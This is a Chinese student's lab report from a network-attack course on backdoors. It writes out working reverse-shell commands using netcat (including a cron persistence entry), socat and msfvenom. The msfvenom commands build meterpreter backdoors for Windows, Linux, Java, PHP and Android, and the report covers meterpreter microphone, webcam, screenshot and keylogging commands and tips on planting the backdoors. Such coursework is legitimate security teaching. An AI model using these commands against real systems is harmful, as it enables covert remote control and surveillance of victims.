2018-2019-2 《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 《网络对抗技术》Exp2 后门原理与实践

1. 后门原理与实践实验说明及预备知识

一、实验说明

  • 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分)

  • 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分)

  • 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

  • 任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

二、常用后门工具

任务一:Windows获得Linux Shell

1、在Windows下使用ipconfig查看本机IP:

2、使用ncat.exe程序监听本机的5316端口:

3、在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5316端口:

4、成功获得Kali的shell,如下图所示:

任务二:Linux获得Windows Shell

1、在Kali环境中使用ifconfig查看IP:

2、使用nc指令监听5316端口:

3、在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的5316端口:

4、Kali下可以看到Windows的命令提示,可以输入Windows命令:

任务三:使用nc传输数据

1、Windows下监听5316端口:

2、Kali下连接到Windows的5316端口:

3、建立连接之后,就可以传输数据了:

三、Meterpreter

任务一:使用netcat获取主机操作Shell,cron启动

1、在Windows系统下,监听5316端口:

2、用crontab -e指令编辑一条定时任务

3、在最后一行添加1 * * * * /bin/netcat 192.168.1.127 5316 -e /bin/sh,意思是在每个小时的第45分钟反向连接Windows主机的5316端口:

4、当时间到了18点01时,此时已经获得了Kali的shell,可以输入指令:

任务二:使用socat获取主机操作Shell, 任务计划启动

预备知识:

socat是ncat的增强版,它使用的格式是socat [options]

,其中两个address是必选项,而options 是可选项。

socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

实践过程:

1、在win10系统下,右击屏幕左下角windows图标,选择“计算机管理”。

在任务计划程序创建任务,填写任务名称,并新建一个触发器。

2、在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5316 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5316,同时把cmd.exe的stderr重定向到stdout上:

3、创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行:

4、此时,在Kali环境下输入指令socat - tcp:192.168.1.127:5316,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5316端口,此时可以发现已经成功获得了一个cmd shell:

任务三:使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1、输入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.148 LPORT=5316 -f exe > 20155316_backdoor.exe

生成后门程序:

2、通过nc指令将生成的后门程序传送到Windows主机上:

3、在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:

4、设置完成后,执行监听:

5、运行Windows下的后门程序:

6、此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:

任务四:使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容

1、使用record_mic指令可以截获一段音频:

2、使用webcam_snap指令可以使用摄像头进行拍照:

3、使用screenshot指令可以进行截屏:

4、使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:

  1. 实验中遇到的问题及思考
    『问题:Metasploit如何生成各种类型的后门?』
    Metasploit可以生成各种格式的后门。除了本次实验生成的exe(Windows下的后门),还有Linux环境下的后门、PHP后门、java后门、Android后门,以及shellcode等等。具体如何生成各种类型的后门呢?

1、 Linux下的后门:操作方法与Windows后门类似,输入msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.148 LPORT=5316 x> 20155316_backdoor生成木马。

与windows系统唯一的区别是,在linux下生成的木马需要通过使用命令chmod +x 程序名赋予可执行的权限。

执行时使用./程序名即可。

2、生成Java后门程序:Java程序在windows下和在linux下都可以生效执行。使用msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.148 lport=5316 x> 20155316_backdoor.jar生成木马。

3、生成PHP后门程序:使用msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.148 lport=5316 x> 20155316_backdoor.php生成木马。

把生成的木马php文件放到网站上面,当别人访问的时候就会执行。

4、生成Android后门程序:使用msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.148 lport=5316 x> 20155316_backdoor.apk生成木马。

此时的木马是apk安装包形式,诱导用户点击此安装包,就会执行。

5、生成shellcode:使用msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.1.148 lport=5316 -f c生成一段shellcode。

将此shellcode写入可执行文件,执行时就会回连攻击机。

posted @ 2019-03-23 09:07  treebeard  阅读(247)  评论(0编辑  收藏  举报